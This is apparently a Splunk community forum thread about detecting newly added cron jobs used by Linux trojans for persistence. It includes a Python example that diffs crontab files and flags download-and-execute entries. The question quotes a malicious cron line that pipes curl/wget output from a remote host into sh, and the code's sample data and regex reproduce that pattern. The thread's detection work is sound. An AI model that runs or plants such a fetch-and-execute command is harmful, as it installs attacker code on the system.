Splunk Enterprise

How to use Splunk to monitor the addition of a cron job


When a Trojan or virus is implanted in a Linux OS, it will add a cron job to persist the Trojan.

For example:

(curl -fsSL https://xxxx.com/raw/sByq0rym || wget -q -O- https://xxx.com/raw/sByq0rym)|sh

So, can I use Splunk to monitor newly added cron jobs?


Super Champion

You can monitor crontab files and apply your logic to find newly added cron jobs.

The below doc is helpful to find out cronjob location 


If this helps, give a like below.
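
One way to apply the "monitor crontab files and apply your logic" advice above, as an added example that is not part of the original thread and not Splunk's own code: it diffs a crontab's current contents against a stored baseline and emits one key=value event per new job, flagging fetch-and-pipe-to-shell entries like the one in the question. The function names, the event fields and the sample crontab are assumptions made for illustration; the caller is assumed to supply the baseline and current file contents (for example from a Splunk scripted input).

```python
import re

# curl/wget output piped into a shell, as in the entry quoted in the question.
FETCH_PIPE_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entries(text):
    """Return the set of job lines, ignoring blanks, comments and VAR=value lines."""
    entries = set()
    for raw in text.splitlines():
        line = " ".join(raw.split())  # collapse whitespace so re-indenting is not "new"
        if line and not line.startswith("#") and not ENV_ASSIGNMENT.match(line):
            entries.add(line)
    return entries

def new_entries(baseline_text, current_text):
    """Job lines present now that were not in the stored baseline."""
    return sorted(parse_entries(current_text) - parse_entries(baseline_text))

def to_events(cron_file, entries):
    """Render one key=value line per new job for Splunk to index (hypothetical fields)."""
    events = []
    for entry in entries:
        suspicious = "true" if FETCH_PIPE_SHELL.search(entry) else "false"
        quoted = entry.replace("\\", "\\\\").replace('"', '\\"')
        events.append(f'action=cron_job_added cron_file="{cron_file}" '
                      f'suspicious={suspicious} entry="{quoted}"')
    return events

# Constructed sample data (placeholder host, not taken from a real incident).
BASELINE = """SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root run-parts /etc/cron.hourly
"""
CURRENT = BASELINE + (
    "*/10 * * * * root (curl -fsSL https://example.invalid/raw/PLACEHOLDER"
    " || wget -q -O- https://example.invalid/raw/PLACEHOLDER) | sh\n"
    "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n"
)

if __name__ == "__main__":
    for event in to_events("/etc/crontab", new_entries(BASELINE, CURRENT)):
        print(event)
```

Once these events are indexed, a search on `action=cron_job_added suspicious=true` surfaces entries of the kind shown in the question, while `suspicious=false` additions remain available for review.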